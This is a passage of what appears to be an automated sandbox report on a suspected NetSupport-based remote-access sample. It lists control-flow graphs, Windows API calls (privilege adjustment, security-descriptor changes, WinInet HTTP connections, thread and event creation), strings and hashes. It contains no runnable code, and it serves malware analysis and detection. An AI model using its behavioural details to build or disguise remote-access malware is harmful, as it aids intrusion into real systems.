1109e405-1109e41e GetModuleFileNameA 743->747 754 1109e372-1109e373 LocalFree 744->754 755 1109e375-1109e37f 744->755 745->744 750 1109e4f9-1109e512 call 11161d20 GetTickCount 746->750 751 1109e4b5-1109e4b8 746->751 752 1109e4bd-1109e4d8 call 1112ef20 747->752 753 1109e424-1109e42d 747->753 781 1109e514-1109e519 750->781 758 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 751->758 779 1109e4da-1109e4db LocalFree 752->779 780 1109e4dd-1109e4e5 752->780 753->752 759 1109e433-1109e436 753->759 754->755 761 1109e7fe-1109e800 call 1109d8c0 755->761 784 1109e60b-1109e622 CreateEventA 758->784 785 1109e605 758->785 768 1109e479-1109e49c call 1112ef20 call 1109d8c0 759->768 769 1109e438-1109e43c 759->769 761->729 762->731 773 1109e2f3-1109e2f4 FreeLibrary 762->773 763->762 772 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 763->772 765->766 775 1109e3e8-1109e3f2 766->775 776 1109e3e5-1109e3e6 LocalFree 766->776 768->746 769->768 778 1109e43e-1109e449 769->778 772->762 773->731 775->761 776->775 786 1109e450-1109e454 778->786 779->780 787 1109e4ea-1109e4f4 780->787 788 1109e4e7-1109e4e8 LocalFree 780->788 789 1109e51b-1109e52a 781->789 790 1109e52c 781->790 795 1109e624-1109e643 GetLastError * 2 call 1112ef20 784->795 796 1109e646-1109e64e 784->796 785->784 793 1109e470-1109e472 786->793 794 1109e456-1109e458 786->794 787->761 788->787 789->781 789->790 792 1109e52e-1109e534 790->792 797 1109e545-1109e59d 792->797 798 1109e536-1109e543 792->798 802 1109e475-1109e477 793->802 799 1109e45a-1109e460 794->799 800 1109e46c-1109e46e 794->800 795->796 803 1109e650 796->803 804 1109e656-1109e667 CreateEventA 796->804 797->758 798->792 798->797 799->793 805 1109e462-1109e46a 799->805 800->802 802->752 802->768 803->804 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 804->807 808 1109e68b-1109e693 804->808 805->786 805->800 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 816 1109e6db 814->816 817 1109e6e1-1109e6f2 CreateEventA 814->817 816->817 819 1109e714-1109e722 817->819 820 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->820 822 1109e724-1109e725 LocalFree 819->822 823 1109e727-1109e72f 819->823 820->819 822->823 824 1109e731-1109e732 LocalFree 823->824 825 1109e734-1109e73d 823->825 824->825 827 1109e743-1109e746 825->827 828 1109e7e7-1109e7f9 call 1112ef20 825->828 827->828 830 1109e74c-1109e74f 827->830 828->761 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->761 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->722 839->838
                                                                                                      APIs
                                                                                                        • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,4764EAAA,00080000,00000000,00000000), ref: 1109D46D
                                                                                                        • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                        • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                        • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                      • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,4764EAAA,00080000,00000000,00000000), ref: 1109E225
                                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                                      • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                                      • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                                      • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                                      • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                                      • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                                      • GetLastError.KERNEL32 ref: 1109E33D
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                                      • GetLastError.KERNEL32 ref: 1109E390
                                                                                                      • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                                        • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                                        • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                                      • _memset.LIBCMT ref: 1109E500
                                                                                                      • GetTickCount.KERNEL32 ref: 1109E508
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                                      • GetLastError.KERNEL32 ref: 1109E624
                                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                                      • GetLastError.KERNEL32 ref: 1109E669
                                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                                      • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                                      • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                                      • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                                      • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                                      • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                                      • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                                      • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                                      • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                                      • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                      • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                      • API String ID: 3291243470-2792520954
                                                                                                      • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                                      • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                                      • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                                      • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 855 1102972a-1102972d 851->855 856 1102968b-110296a3 call 11162b51 851->856 853 11029653-1102966a GetProcAddress 852->853 854 1102966c-1102966f 852->854 853->854 859 11029671-11029673 SetLastError 853->859 854->851 857 11029748-11029760 InternetOpenA 855->857 858 1102972f-11029746 GetProcAddress 855->858 865 110296c4-110296d0 856->865 866 110296a5-110296be GetProcAddress 856->866 863 11029784-11029790 call 11162be5 857->863 858->857 862 11029779-11029781 SetLastError 858->862 859->851 862->863 872 11029796-110297c7 call 11142290 call 11164390 863->872 873 11029a0a-11029a14 863->873 871 110296d2-110296db GetLastError 865->871 874 110296f1-110296f3 865->874 866->865 868 11029762-1102976a SetLastError 866->868 868->871 871->874 875 110296dd-110296ef call 11162be5 call 11162b51 871->875 900 110297c9-110297cc 872->900 901 110297cf-110297e4 call 11081a70 * 2 872->901 873->845 876 11029a1a 873->876 880 11029710-1102971c 874->880 881 110296f5-1102970e GetProcAddress 874->881 875->874 879 11029a2c-11029a2f 876->879 886 11029a31-11029a36 879->886 887 11029a3b-11029a3e 879->887 880->855 894 1102971e-11029727 880->894 881->880 884 1102976f-11029777 SetLastError 881->884 884->855 892 11029b9f-11029ba7 886->892 888 11029a40-11029a45 887->888 889 11029a4a 887->889 895 11029b6f-11029b74 888->895 896 11029a4d-11029a55 889->896 898 11029bb0-11029bc3 892->898 899 11029ba9-11029baa FreeLibrary 892->899 894->855 905 11029b76-11029b8d GetProcAddress 895->905 906 11029b8f-11029b95 895->906 903 11029a57-11029a6e GetProcAddress 896->903 904 11029a74-11029a7d 896->904 899->898 900->901 918 110297e6-110297ea 901->918 919 110297ed-110297f9 901->919 903->904 908 11029b2e-11029b30 SetLastError 903->908 911 11029a80-11029a82 904->911 905->906 909 11029b97-11029b99 SetLastError 905->909 906->892 913 11029b36-11029b3d 908->913 909->892 911->913 915 11029a88-11029a8d 911->915 916 11029b4c-11029b6d call 110278a0 * 2 913->916 915->916 920 11029a93-11029acf call 1110f4a0 call 11027850 915->920 916->895 918->919 922 11029824-11029829 919->922 923 110297fb-110297fd 919->923 947 11029ae1-11029ae3 920->947 948 11029ad1-11029ad4 920->948 929 1102982b-1102983c GetProcAddress 922->929 930 1102983e-11029855 InternetConnectA 922->930 926 11029814-1102981a 923->926 927 110297ff-11029812 GetProcAddress 923->927 926->922 927->926 934 1102981c-1102981e SetLastError 927->934 929->930 936 11029881-1102988c SetLastError 929->936 931 110299f7-11029a07 call 111618c1 930->931 932 1102985b-1102985e 930->932 931->873 937 11029860-11029862 932->937 938 11029899-110298a1 932->938 934->922 936->931 942 11029864-11029877 GetProcAddress 937->942 943 11029879-1102987f 937->943 945 110298a3-110298b7 GetProcAddress 938->945 946 110298b9-110298d4 938->946 942->943 951 11029891-11029893 SetLastError 942->951 943->938 945->946 952 110298d6-110298de SetLastError 945->952 958 110298e1-110298e4 946->958 949 11029ae5 947->949 950 11029aec-11029af1 947->950 948->947 953 11029ad6-11029ada 948->953 949->950 954 11029af3-11029b09 call 110d1090 950->954 955 11029b0c-11029b0e 950->955 951->938 952->958 953->947 959 11029adc 953->959 954->955 961 11029b10-11029b12 955->961 962 11029b14-11029b25 call 111618c1 955->962 963 110299f2-110299f5 958->963 964 110298ea-110298ef 958->964 959->947 961->962 969 11029b3f-11029b49 call 111618c1 961->969 962->916 979 11029b27-11029b29 962->979 963->931 968 11029a1c-11029a29 call 111618c1 963->968 965 110298f1-11029908 GetProcAddress 964->965 966 1102990a-11029916 HttpSendRequestA 964->966 965->966 971 11029918-11029920 SetLastError 965->971 972 11029922-1102993b GetLastError 966->972 968->879 969->916 971->972 977 11029956-1102996b 972->977 978 1102993d-11029954 GetProcAddress 972->978 983 11029975-11029983 GetLastError 977->983 978->977 981 1102996d-1102996f SetLastError 978->981 979->896 981->983 984 11029985-1102998a 983->984 985 1102998c-11029998 GetDesktopWindow 983->985 984->985 986 110299e2-110299e7 984->986 987 110299b3-110299cf 985->987 988 1102999a-110299b1 GetProcAddress 985->988 986->963 989 110299e9-110299ef 986->989 987->963 992 110299d1 987->992 988->987 990 110299d6-110299e0 SetLastError 988->990 989->963 990->963 992->958
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll,4764EAAA,74DF23A0,?,00000000), ref: 110295C5
                                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                                      • _malloc.LIBCMT ref: 11029697
                                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                                      • GetLastError.KERNEL32 ref: 110296D2
                                                                                                      • _free.LIBCMT ref: 110296DE
                                                                                                      • _malloc.LIBCMT ref: 110296E7
                                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                                      • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                                      • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                                      • _free.LIBCMT ref: 11029785
                                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                                      • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                                      • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                                      • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                                      • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                                      • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                                      • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                      • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                      • API String ID: 921868004-913974648
                                                                                                      • Opcode ID: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                                      • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                                      • Opcode Fuzzy Hash: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                                      • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 993 6c767030-6c767050 call 6c752a90 call 6c76dbd0 998 6c767097 993->998 999 6c767052-6c767095 LoadLibraryA 993->999 1000 6c767099-6c7670f8 call 6c758d00 InitializeCriticalSection CreateEventA 998->1000 999->1000 1003 6c767111-6c76711e CreateEventA 1000->1003 1004 6c7670fa-6c76710e call 6c756f50 1000->1004 1006 6c767137-6c767144 CreateEventA 1003->1006 1007 6c767120-6c767134 call 6c756f50 1003->1007 1004->1003 1010 6c767146-6c76715a call 6c756f50 1006->1010 1011 6c76715d-6c767170 WSAStartup 1006->1011 1007->1006 1010->1011 1014 6c767172-6c767182 call 6c755290 call 6c752b70 1011->1014 1015 6c767183-6c7671b2 call 6c771b69 1011->1015 1022 6c7671b4-6c7671cd call 6c756f50 1015->1022 1023 6c7671d0-6c7671e4 call 6c771c50 1015->1023 1022->1023 1029 6c7671e6-6c7671e9 1023->1029 1030 6c7671fa-6c767202 1023->1030 1029->1030 1033 6c7671eb-6c7671f1 1029->1033 1031 6c767204 1030->1031 1032 6c767209-6c767223 call 6c773753 1030->1032 1031->1032 1037 6c767225-6c767239 call 6c756f50 1032->1037 1038 6c76723c-6c767255 call 6c769bf0 1032->1038 1033->1030 1035 6c7671f3-6c7671f8 1033->1035 1035->1032 1037->1038 1043 6c767257-6c76725e 1038->1043 1044 6c76726a-6c767271 call 6c755730 1038->1044 1045 6c767260-6c767268 1043->1045 1048 6c767277-6c76729a call 6c771b69 1044->1048 1049 6c76730b-6c767310 1044->1049 1045->1044 1045->1045 1057 6c7672be-6c7672dc call 6c771c50 call 6c771b69 1048->1057 1058 6c76729c-6c7672bb call 6c756f50 1048->1058 1050 6c767312-6c767315 1049->1050 1051 6c76731e-6c767336 call 6c755e90 call 6c755530 1049->1051 1050->1051 1054 6c767317-6c76731c 1050->1054 1056 6c767339-6c767354 call 6c755e90 1051->1056 1054->1051 1054->1056 1069 6c767356-6c76735c 1056->1069 1070 6c767361-6c76738b GetTickCount CreateThread 1056->1070 1076 6c7672de-6c7672f7 call 6c756f50 1057->1076 1077 6c7672fa-6c767308 call 6c771c50 1057->1077 1058->1057 1069->1070 1072 6c76738d-6c7673a6 call 6c756f50 1070->1072 1073 6c7673a9-6c7673b6 SetThreadPriority 1070->1073 1072->1073 1074 6c7673cf-6c7673ed call 6c755f20 call 6c755e90 1073->1074 1075 6c7673b8-6c7673cc call 6c756f50 1073->1075 1090 6c7673f5-6c7673f7 1074->1090 1091 6c7673ef 1074->1091 1075->1074 1076->1077 1077->1049 1092 6c767425-6c767447 GetModuleFileNameA call 6c752420 1090->1092 1093 6c7673f9-6c767407 call 6c76dbd0 1090->1093 1091->1090 1098 6c76744c 1092->1098 1099 6c767449-6c76744a 1092->1099 1100 6c76741e 1093->1100 1101 6c767409-6c76741c call 6c754580 1093->1101 1103 6c767451-6c76746d 1098->1103 1099->1103 1102 6c767420 1100->1102 1101->1102 1102->1092 1106 6c767470-6c76747f 1103->1106 1106->1106 1107 6c767481-6c767486 1106->1107 1108 6c767487-6c76748d 1107->1108 1108->1108 1109 6c76748f-6c7674c8 GetPrivateProfileIntA GetModuleHandleA 1108->1109 1110 6c767563-6c76758f CreateMutexA timeBeginPeriod 1109->1110 1111 6c7674ce-6c7674fa call 6c755e90 * 2 1109->1111 1116 6c767536-6c76755d call 6c755e90 * 2 1111->1116 1117 6c7674fc-6c767511 call 6c755e90 1111->1117 1116->1110 1122 6c767513-6c767528 call 6c755e90 1117->1122 1123 6c76752a-6c767530 1117->1123 1122->1116 1122->1123 1123->1116
                                                                                                      APIs
                                                                                                        • Part of subcall function 6C752A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C752ACB
                                                                                                        • Part of subcall function 6C752A90: _strrchr.LIBCMT ref: 6C752ADA
                                                                                                        • Part of subcall function 6C752A90: _strrchr.LIBCMT ref: 6C752AEA
                                                                                                        • Part of subcall function 6C752A90: wsprintfA.USER32 ref: 6C752B05
                                                                                                        • Part of subcall function 6C76DBD0: _malloc.LIBCMT ref: 6C76DBE9
                                                                                                        • Part of subcall function 6C76DBD0: wsprintfA.USER32 ref: 6C76DC04
                                                                                                        • Part of subcall function 6C76DBD0: _memset.LIBCMT ref: 6C76DC27
                                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C767057
                                                                                                      • InitializeCriticalSection.KERNEL32(6C79B898), ref: 6C7670DF
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C7670EF
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C767115
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C76713B
                                                                                                      • WSAStartup.WSOCK32(00000101,6C79B91A), ref: 6C767167
                                                                                                      • _malloc.LIBCMT ref: 6C7671A3
                                                                                                        • Part of subcall function 6C771B69: __FF_MSGBANNER.LIBCMT ref: 6C771B82
                                                                                                        • Part of subcall function 6C771B69: __NMSG_WRITE.LIBCMT ref: 6C771B89
                                                                                                        • Part of subcall function 6C771B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C77D3C1,6C776E81,00000001,6C776E81,?,6C77F447,00000018,6C797738,0000000C,6C77F4D7), ref: 6C771BAE
                                                                                                      • _memset.LIBCMT ref: 6C7671D3
                                                                                                      • _calloc.LIBCMT ref: 6C767214
                                                                                                      • _malloc.LIBCMT ref: 6C76728B
                                                                                                      • _memset.LIBCMT ref: 6C7672C1
                                                                                                      • _malloc.LIBCMT ref: 6C7672CD
                                                                                                      • _memset.LIBCMT ref: 6C767303
                                                                                                      • GetTickCount.KERNEL32 ref: 6C767361
                                                                                                      • CreateThread.KERNEL32(00000000,00004000,6C766BA0,00000000,00000000,6C79BACC), ref: 6C76737E
                                                                                                      • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C7673AC
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Downloads\Support\,00000104), ref: 6C767430
                                                                                                      • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Downloads\Support\pci.ini), ref: 6C7674B0
                                                                                                      • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C7674C0
                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C767566
                                                                                                      • timeBeginPeriod.WINMM(00000001), ref: 6C767573
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                      • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$849224$C:\Users\Public\Downloads\Support\$C:\Users\Public\Downloads\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                      • API String ID: 3160247386-2610161096
                                                                                                      • Opcode ID: 2c747c6528a41cf7b07bb540936b3095344396694972a98602176c0528bc923f
                                                                                                      • Instruction ID: 61c331091e57132dbc6c4c2a933027c1f91816a76141c0a00db65b6e9f8fd29e
                                                                                                      • Opcode Fuzzy Hash: 2c747c6528a41cf7b07bb540936b3095344396694972a98602176c0528bc923f
                                                                                                      • Instruction Fuzzy Hash: 20D1FBB1A00314AFDB20AF369E8DD567BB8FB09388B544839FC09D7F41E731A9558B91
                                                                                                      APIs
                                                                                                        • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,026AB878,000000FF,?), ref: 11144ED5
                                                                                                        • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,026AB878,000000FF,?), ref: 11144EE5
                                                                                                      • _fgets.LIBCMT ref: 11061DC2
                                                                                                      • _strpbrk.LIBCMT ref: 11061E29
                                                                                                      • _fgets.LIBCMT ref: 11061F2C
                                                                                                      • _strpbrk.LIBCMT ref: 11061FA3
                                                                                                      • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                                      • _fgets.LIBCMT ref: 11062035
                                                                                                      • _strpbrk.LIBCMT ref: 1106205B
                                                                                                      Strings
                                                                                                      Memory Dump Source
